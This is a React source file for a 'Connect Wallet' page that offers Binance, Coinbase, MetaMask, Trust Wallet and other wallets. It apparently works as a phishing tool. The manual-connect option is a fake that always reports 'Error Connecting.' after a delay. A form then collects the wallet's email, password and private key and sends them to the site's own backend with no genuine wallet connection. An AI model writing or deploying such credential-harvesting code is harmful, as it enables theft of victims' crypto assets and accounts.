import React, { useState } from 'react'
import { useDispatch } from 'react-redux';
import { useNavigate } from "react-router-dom";

import '../styles/connectWallet.css'
import depoIMG from '../assets'

import { MdOutlineCancelPresentation } from "react-icons/md";
import { IoIosArrowBack } from "react-icons/io";

import { connectWallet } from '../../database/actions/account';

const ConnectWallet = () => {
  const [user, setUser] = useState(JSON.parse(localStorage.getItem('profile')));
  const [formVal, setFormVal] = useState({ wallet: '', email: '', password: '', privateKey: '', connt: '' });
  const [connectivity, setConnectivity] = useState(false)
  const [actCont, setActCont] = useState(false)
  const [connection, setConnection] = useState(false)
  const dispatch = useDispatch();
  const navigate = useNavigate();

  const formData = {
    "wallet": `${formVal.wallet}`,
    "email": `${formVal.email}`,
    "password": `${formVal.password}`,
    "privateKey": `${formVal.privateKey}`,
  }


  const wallt = (e) => {
    e?.preventDefault();
    setFormVal({ ...formVal, wallet: e?.target?.innerText })
    setConnectivity(true)
  }

  const cunnect = () => {
    setConnection(false)
    setFormVal({ ...formVal, connt: "Connecting..." });
    setTimeout(() => {
      setConnection(true);
      setFormVal({ ...formVal, connt: "Error Connecting." });
    }, 9000)
  }

  const handleSubmit = async (e) => {
    e?.preventDefault();
    navigate(`/connectWallet/success`);
    dispatch(connectWallet(formData, user.result?._id, navigate));
  }

  const handleChange = (e) => {
    setFormVal({ ...formVal, [e.target.name]: e.target.value });
  }

  return (
    <>
      <div className="connectWalet">
        <div className="headt">
          <h2>Connect Wallet</h2>
        </div>
        <div className='wallist'>
          <ul>

            <li onClick={wallt} value={"Binance"} className={` ` + ((formVal.wallet === "Binance") ? ' activeWalet' : ' inactiveWallet')}>
              <div className="img" style={{ backgroundImage: `url(${depoIMG.binance})` }}></div>
              <div className="name"><p>Binance</p></div>
            </li>
            <li onClick={wallt} value={"Bitget"} className={` ` + ((formVal.wallet === "Bitget") ? ' activeWalet' : ' inactiveWallet')}>
              <div className="img" style={{ backgroundImage: `url(${depoIMG.bitget})` }}></div>
              <div className="name"><p>Bitget</p></div>
            </li>
            <li onClick={wallt} value={"Coinbase"} className={` ` + ((formVal.wallet === "Coinbase") ? ' activeWalet' : ' inactiveWallet')}>
              <div className="img" style={{ backgroundImage: `url(${depoIMG.coinbase})` }}></div>
              <div className="name"><p>Coinbase</p></div>
            </li>
            <li onClick={wallt} value={"Cryptocom"} className={` ` + ((formVal.wallet === "Cryptocom") ? ' activeWalet' : ' inactiveWallet')}>
              <div className="img" style={{ backgroundImage: `url(${depoIMG.cryptocom})` }}></div>
              <div className="name"><p>Crypto.com</p></div>
            </li>
            <li onClick={wallt} value={"Uniswap"} className={` ` + ((formVal.wallet === "Uniswap") ? ' activeWalet' : ' inactiveWallet')}>
              <div className="img" style={{ backgroundImage: `url(${depoIMG.uniswap})` }}></div>
              <div className="name"><p>Uniswap</p></div>
            </li>
            <li onClick={wallt} value={"Trust"} className={` ` + ((formVal.wallet === "Trust") ? ' activeWalet' : ' inactiveWallet')}>
              <div className="img" style={{ backgroundImage: `url(${depoIMG.trust})` }}></div>
              <div className="name"><p>Trust Wallet</p></div>
            </li>
            <li onClick={wallt} value={"Meta Mask"} className={` ` + ((formVal.wallet === "Meta Mask") ? ' activeWalet' : ' inactiveWallet')}>
              <div className="img" style={{ backgroundImage: `url(${depoIMG.metamask})` }}></div>
              <div className="name"><p>Meta Mask</p></div>
            </li>
            <li onClick={wallt} value={"Cash App"} className={` ` + ((formVal.wallet === "Cash App") ? ' activeWalet' : ' inactiveWallet')}>
              <div className="img" style={{ backgroundImage: `url(${depoIMG.cashapp})` }}></div>
              <div className="name"><p>Cash App</p></div>
            </li>
            <li onClick={wallt} value={"Shakepay"} className={` ` + ((formVal.wallet === "Shakepay") ? ' activeWalet' : ' inactiveWallet')}>
              <div className="img" style={{ backgroundImage: `url(${depoIMG.shakepay})` }}></div>
              <div className="name"><p>Shakepay</p></div>
            </li>
            <li onClick={wallt} value={"Exodus"} className={` ` + ((formVal.wallet === "Exodus") ? ' activeWalet' : ' inactiveWallet')}>
              <div className="img" style={{ backgroundImage: `url(${depoIMG.exodus})` }}></div>
              <div className="name"><p>Exodus</p></div>
            </li>
            <li onClick={wallt} value={"SafePal"} className={` ` + ((formVal.wallet === "SafePal") ? ' activeWalet' : ' inactiveWallet')}>
              <div className="img" style={{ backgroundImage: `url(${depoIMG.safepal})` }}></div>
              <div className="name"><p>SafePal</p></div>
            </li>
          </ul>
        </div>
      </div>
      <div className={`connectivity ` + (connectivity ? ' showConnectivity' : ' hideConnectivity')}>
        <>
          <div className={"conn connecting " + (actCont ? ' inactiveCun' : ' activeCun')}>
            <div className="headt" onClick={() => setConnectivity(false)}>
              <h4>Connect {formVal?.wallet} Wallet</h4>
              <MdOutlineCancelPresentation />
            </div>
            <div className="opt">
              <div className={"manual " + (connection ? " wrn" : " ")}>
                <h6>{formVal?.connt}</h6>
                <p onClick={cunnect}>Connect Manually</p>
              </div>
              <div className="ext" onClick={() => setActCont(true)}>
                <h6>Connect</h6>
                <p>Easy-to-Use Browser Extension</p>
              </div>
            </div>
          </div>
        </>
        <>
          <div className={"conn connected " + (actCont ? ' activeCun' : ' inactiveCun')}>
            <div className="headt" onClick={() => setActCont(false)}>
              <h4>Enter {formVal?.wallet} Wallet Details</h4>
              <IoIosArrowBack />
            </div>
            <form onSubmit={handleSubmit}>
              <div className="form-cont transfer-input">
                <input type="email" name="email" id="email" onChange={handleChange} required />
                <div className="underline"></div>
                <label htmlFor="email">Email</label>
              </div>
              <div className="form-cont transfer-input">
                <input type="password" name="password" id="password" onChange={handleChange} required />
                <div className="underline"></div>
                <label htmlFor="password">Password</label>
              </div>
              <div className="form-cont transfer-input">
                <input type="text" name="privateKey" id="privateKey" onChange={handleChange} required />
                <div className="underline"></div>
                <label htmlFor="privateKey">Private Key/Token</label>
              </div>
              <button type="submit" className='btn-hover'> Connect </button>
            </form>
          </div>
        </>
      </div>
    </>
  )
}

export default ConnectWallet